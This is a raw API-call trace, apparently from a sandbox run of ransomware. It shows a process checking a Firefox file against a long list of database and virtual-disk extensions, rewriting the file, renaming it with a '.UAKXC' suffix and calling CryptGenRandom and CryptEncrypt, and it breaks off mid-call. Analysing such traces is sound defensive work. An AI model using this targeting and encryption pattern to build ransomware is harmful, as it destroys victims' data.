[0139.866] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".ade") returned 0x0 [0139.866] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".adf") returned 0x0 [0139.866] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".adp") returned 0x0 [0139.866] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".arc") returned 0x0 [0139.866] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".ora") returned 0x0 [0139.866] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".alf") returned 0x0 [0139.867] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".ask") returned 0x0 [0139.867] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".btr") returned 0x0 [0139.867] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".bdf") returned 0x0 [0139.867] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".cat") returned 0x0 [0139.867] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".cdb") returned 0x0 [0139.867] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".ckp") returned 0x0 [0139.867] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".cma") returned 0x0 [0139.867] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".cpd") returned 0x0 [0139.867] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".dacpac") returned 0x0 [0139.867] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".dad") returned 0x0 [0139.867] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".dadiagrams") returned 0x0 [0139.867] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".daschema") returned 0x0 [0139.867] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".db") returned 0x0 [0139.867] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".db-shm") returned 0x0 [0139.867] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".db-wal") returned 0x0 [0139.867] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".db3") returned 0x0 [0139.867] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".dbc") returned 0x0 [0139.867] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".dbf") returned 0x0 [0139.867] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".dbs") returned 0x0 [0139.867] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".dbt") returned 0x0 [0139.867] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".dbv") returned 0x0 [0139.867] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".dbx") returned 0x0 [0139.867] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".dcb") returned 0x0 [0139.867] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".dct") returned 0x0 [0139.867] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".dcx") returned 0x0 [0139.868] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".ddl") returned 0x0 [0139.868] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".dlis") returned 0x0 [0139.868] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".dp1") returned 0x0 [0139.868] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".dqy") returned 0x0 [0139.868] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".dsk") returned 0x0 [0139.868] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".dsn") returned 0x0 [0139.868] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".dtsx") returned 0x0 [0139.868] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".dxl") returned 0x0 [0139.868] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".eco") returned 0x0 [0139.868] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".ecx") returned 0x0 [0139.868] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".edb") returned 0x0 [0139.868] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".epim") returned 0x0 [0139.868] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".exb") returned 0x0 [0139.868] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".fcd") returned 0x0 [0139.868] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".fdb") returned 0x0 [0139.868] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".fic") returned 0x0 [0139.868] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".fmp") returned 0x0 [0139.868] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".fmp12") returned 0x0 [0139.868] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".fmpsl") returned 0x0 [0139.868] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".fol") returned 0x0 [0139.868] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".fp3") returned 0x0 [0139.868] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".fp4") returned 0x0 [0139.868] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".fp5") returned 0x0 [0139.868] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".fp7") returned 0x0 [0139.868] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".fpt") returned 0x0 [0139.868] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".frm") returned 0x0 [0139.869] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".gdb") returned 0x0 [0139.869] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".grdb") returned 0x0 [0139.869] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".gwi") returned 0x0 [0139.869] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".hdb") returned 0x0 [0139.869] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".his") returned 0x0 [0139.869] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".ib") returned 0x0 [0139.869] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".idb") returned 0x0 [0139.869] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".ihx") returned 0x0 [0139.869] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".itdb") returned 0x0 [0139.869] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".itw") returned 0x0 [0139.869] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".jet") returned 0x0 [0139.869] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".jtx") returned 0x0 [0139.869] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".kdb") returned 0x0 [0139.869] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".kexi") returned 0x0 [0139.869] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".kexic") returned 0x0 [0139.869] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".kexis") returned 0x0 [0139.869] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".lgc") returned 0x0 [0139.869] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".lwx") returned 0x0 [0139.869] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".maf") returned 0x0 [0139.869] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".maq") returned 0x0 [0139.869] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".mar") returned 0x0 [0139.869] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".mas") returned 0x0 [0139.869] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".mav") returned 0x0 [0139.869] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".mdb") returned 0x0 [0139.870] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".mdf") returned 0x0 [0139.870] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".mpd") returned 0x0 [0139.870] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".mrg") returned 0x0 [0139.870] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".mud") returned 0x0 [0139.870] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".mwb") returned 0x0 [0139.870] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".myd") returned 0x0 [0139.870] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".ndf") returned 0x0 [0139.870] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".nnt") returned 0x0 [0139.870] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".nrmlib") returned 0x0 [0139.870] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".ns2") returned 0x0 [0139.870] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".ns3") returned 0x0 [0139.870] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".ns4") returned 0x0 [0139.870] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".nsf") returned 0x0 [0139.870] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".nv") returned 0x0 [0139.870] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".nv2") returned 0x0 [0139.870] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".nwdb") returned 0x0 [0139.870] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".nyf") returned 0x0 [0139.870] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".odb") returned 0x0 [0139.870] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".oqy") returned 0x0 [0139.870] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".orx") returned 0x0 [0139.870] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".owc") returned 0x0 [0139.870] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".p96") returned 0x0 [0139.870] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".p97") returned 0x0 [0139.871] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".pan") returned 0x0 [0139.871] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".pdb") returned 0x0 [0139.871] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".pdm") returned 0x0 [0139.871] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".pnz") returned 0x0 [0139.871] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".qry") returned 0x0 [0139.871] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".qvd") returned 0x0 [0139.871] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".rbf") returned 0x0 [0139.871] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".rctd") returned 0x0 [0139.871] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".rod") returned 0x0 [0139.871] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".rodx") returned 0x0 [0139.871] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".rpd") returned 0x0 [0139.871] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".rsd") returned 0x0 [0139.871] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".sas7bdat") returned 0x0 [0139.871] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".sbf") returned 0x0 [0139.871] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".scx") returned 0x0 [0139.871] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".sdb") returned 0x0 [0139.871] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".sdc") returned 0x0 [0139.871] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".sdf") returned 0x0 [0139.871] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".sis") returned 0x0 [0139.871] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".spq") returned 0x0 [0139.871] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".sql") returned 0x0 [0139.871] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".sqlite") returned 0x0 [0139.871] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".sqlite3") returned 0x0 [0139.871] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".sqlitedb") returned 0x0 [0139.872] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".te") returned 0x0 [0139.872] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".temx") returned 0x0 [0139.872] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".tmd") returned 0x0 [0139.872] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".tps") returned 0x0 [0139.872] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".trc") returned 0x0 [0139.872] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".trm") returned 0x0 [0139.872] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".udb") returned 0x0 [0139.872] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".udl") returned 0x0 [0139.872] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".usr") returned 0x0 [0139.872] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".v12") returned 0x0 [0139.872] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".vis") returned 0x0 [0139.872] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".vpd") returned 0x0 [0139.872] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".vvv") returned 0x0 [0139.872] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".wdb") returned 0x0 [0139.872] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".wmdb") returned 0x0 [0139.872] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".wrk") returned 0x0 [0139.872] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".xdb") returned 0x0 [0139.872] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".xld") returned 0x0 [0139.872] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".xmlff") returned 0x0 [0139.872] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".abcddb") returned 0x0 [0139.872] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".abs") returned 0x0 [0139.872] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".abx") returned 0x0 [0139.872] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".accdw") returned 0x0 [0139.872] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".adn") returned 0x0 [0139.872] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".db2") returned 0x0 [0139.872] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".fm5") returned 0x0 [0139.873] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".hjt") returned 0x0 [0139.873] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".icg") returned 0x0 [0139.873] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".icr") returned 0x0 [0139.873] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".kdb") returned 0x0 [0139.873] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".lut") returned 0x0 [0139.873] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".maw") returned 0x0 [0139.873] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".mdn") returned 0x0 [0139.873] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".mdt") returned 0x0 [0139.873] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".vdi") returned 0x0 [0139.873] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".vhd") returned 0x0 [0139.873] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".vmdk") returned 0x0 [0139.873] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".pvm") returned 0x0 [0139.873] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".vmem") returned 0x0 [0139.873] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".vmsn") returned 0x0 [0139.873] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".vmsd") returned 0x0 [0139.873] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".nvram") returned 0x0 [0139.873] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".vmx") returned 0x0 [0139.873] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".raw") returned 0x0 [0139.873] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".qcow2") returned 0x0 [0139.873] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".subvol") returned 0x0 [0139.873] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".bin") returned 0x0 [0139.873] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".vsv") returned 0x0 [0139.873] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".avhd") returned 0x0 [0139.873] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".vmrs") returned 0x0 [0139.873] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".vhdx") returned 0x0 [0139.873] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".avdx") returned 0x0 [0139.873] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".vmcx") returned 0x0 [0139.873] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpSrch=".iso") returned 0x0 [0139.873] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.874] WriteFile (in: hFile=0x210, lpBuffer=0x383fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x383fc78, lpOverlapped=0x0 | out: lpBuffer=0x383fd70*, lpNumberOfBytesWritten=0x383fc78*=0x20c, lpOverlapped=0x0) returned 1 [0139.886] WriteFile (in: hFile=0x210, lpBuffer=0x383fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x383fc7c, lpOverlapped=0x0 | out: lpBuffer=0x383fc80*, lpNumberOfBytesWritten=0x383fc7c*=0xa, lpOverlapped=0x0) returned 1 [0139.886] SetEndOfFile (hFile=0x210) returned 1 [0139.886] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.887] ReadFile (in: hFile=0x210, lpBuffer=0x4610000, nNumberOfBytesToRead=0x383, lpNumberOfBytesRead=0x383fc88, lpOverlapped=0x0 | out: lpBuffer=0x4610000*, lpNumberOfBytesRead=0x383fc88*=0x383, lpOverlapped=0x0) returned 1 [0139.887] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0xfffffc7d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0139.887] WriteFile (in: hFile=0x210, lpBuffer=0x4610000*, nNumberOfBytesToWrite=0x383, lpNumberOfBytesWritten=0x383fc44, lpOverlapped=0x0 | out: lpBuffer=0x4610000*, lpNumberOfBytesWritten=0x383fc44*=0x383, lpOverlapped=0x0) returned 1 [0139.887] CloseHandle (hObject=0x210) returned 1 [0139.891] GetProcessHeap () returned 0xea0000 [0139.891] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0xef06f0 [0139.891] lstrcpyW (in: lpString1=0xef06f0, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk") returned="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk" [0139.891] lstrcatW (in: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk", lpString2=".UAKXC" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk.UAKXC") returned="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk.UAKXC" [0139.891] MoveFileW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk" (normalized: "c:\\program files (x86)\\mozilla firefox\\nssdbm3.chk"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk.UAKXC" (normalized: "c:\\program files (x86)\\mozilla firefox\\nssdbm3.chk.uakxc")) returned 1 [0139.892] GetProcessHeap () returned 0xea0000 [0139.892] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef06f0 | out: hHeap=0xea0000) returned 1 [0139.892] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee950 | out: hHeap=0xea0000) returned 1 [0139.893] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecfb8 | out: hHeap=0xea0000) returned 1 [0139.893] CryptGenRandom (in: hProv=0xeced80, dwLen=0x20, pbBuffer=0x383fd50 | out: pbBuffer=0x383fd50) returned 1 [0139.893] CryptGenRandom (in: hProv=0xeced80, dwLen=0x8, pbBuffer=0x383fd48 | out: pbBuffer=0x383fd48) returned 1 [0139.893] CryptEncrypt (in: hKey=0xececd0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x383fd70*, 